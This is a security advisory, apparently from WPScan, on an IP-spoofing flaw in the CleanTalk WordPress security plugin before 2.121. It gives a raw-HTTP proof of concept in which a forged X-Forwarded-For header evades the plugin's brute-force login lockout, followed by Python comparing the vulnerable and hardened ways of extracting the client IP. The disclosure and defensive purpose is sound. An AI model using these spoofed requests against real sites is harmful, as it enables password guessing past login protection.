Security & Malware scan by CleanTalk < 2.121 - IP Spoofing

Source: wpvulndb (wpscan.com)
WPVDB-ID: 1D748F91-773B-49D6-8F68-A27D397713C3
Author: Bartlomiej Marek
Published: Nov 06, 2023 - 12:00 a.m.
Tags: cleantalk, plugin, ip spoofing, bruteforce, bypass, security scan

EPSS: 0.0005 (Low), percentile 17.8%

Description

The plugin derives the client IP address from request headers that a client can set itself (such as X-Forwarded-For) rather than from the connection's source address, so an attacker can choose the value the plugin records. Because the brute-force protection keys its failed-login counter on that address, this can be used to bypass it.

PoC

1. Send 5 invalid login requests and thus block the IP address.

POST /wp-login.php HTTP/1.1
Host: localhost
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
Cookie: wp-settings-time-2=1692902176; betterlinks_visitor=bl64ece171d4145; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dupload%26cats%3Dpop; wp-settings-time-1=1695178741
Connection: close

log=admin&pwd=test&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1

2. Send the login request again with an X-Forwarded-For header carrying a spoofed IP address.

POST /wp-login.php HTTP/1.1
Host: localhost
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
Cookie: wp-settings-time-2=1692902176; betterlinks_visitor=bl64ece171d4145; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dupload%26cats%3Dpop; wp-settings-time-1=1695178741
Connection: close
X-Forwarded-For: 8.8.8.8

log=admin&pwd=test&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1

3. Check the logs by visiting /wp-admin/options-general.php?page=spbc&spbc_tab=security_log.
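The root cause is an IP-extraction routine that believes whatever X-Forwarded-For says. The following is an added example, not code from the advisory or from the CleanTalk plugin: it puts the vulnerable extraction pattern beside a hardened one that only honours proxy headers when the TCP peer is a known proxy, and replays the PoC above against a small per-IP lockout counter to show the difference. The trusted-proxy range, the client address and the limiter are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

# Assumed: address ranges of the reverse proxies in front of the web server.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

def naive_client_ip(remote_addr, headers):
    """Vulnerable pattern: the first X-Forwarded-For entry wins, whoever wrote it."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else remote_addr

def is_trusted(ip):
    return any(ipaddress.ip_address(ip) in net for net in TRUSTED_PROXIES)

def hardened_client_ip(remote_addr, headers):
    """Honour X-Forwarded-For only when the peer is a trusted proxy, and only the
    hops those proxies appended: walk right to left, skipping trusted addresses."""
    if not is_trusted(remote_addr):
        return remote_addr  # direct client: the header is attacker-controlled
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            if not is_trusted(hop):
                return hop
        except ValueError:
            break  # malformed entry: stop trusting the chain
    return remote_addr

class LoginLimiter:
    """Per-IP failed-login counter, parameterised by the IP extraction function."""
    def __init__(self, ip_func, limit=5):
        self.ip_func, self.limit = ip_func, limit
        self.failures = defaultdict(int)
    def record_failure(self, remote_addr, headers):
        self.failures[self.ip_func(remote_addr, headers)] += 1
    def is_blocked(self, remote_addr, headers):
        return self.failures[self.ip_func(remote_addr, headers)] >= self.limit

def simulate(ip_func):
    """Constructed replay of the advisory's PoC: five failures from one client,
    then the same client retries with X-Forwarded-For: 8.8.8.8."""
    limiter = LoginLimiter(ip_func)
    client = "203.0.113.7"  # constructed direct-client address (no proxy in front)
    for _ in range(5):
        limiter.record_failure(client, {})
    return limiter.is_blocked(client, {"X-Forwarded-For": "8.8.8.8"})
```

With `naive_client_ip` the spoofed header moves the sixth attempt into a fresh counter and the lockout never triggers; with `hardened_client_ip` the header is ignored for a direct client and the block holds. When a real proxy is in front, only the rightmost non-proxy hop (the one the proxy itself appended) is used, so a client-supplied leading entry is still discarded.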

Affected version (CPE): operator eq, version 2.121
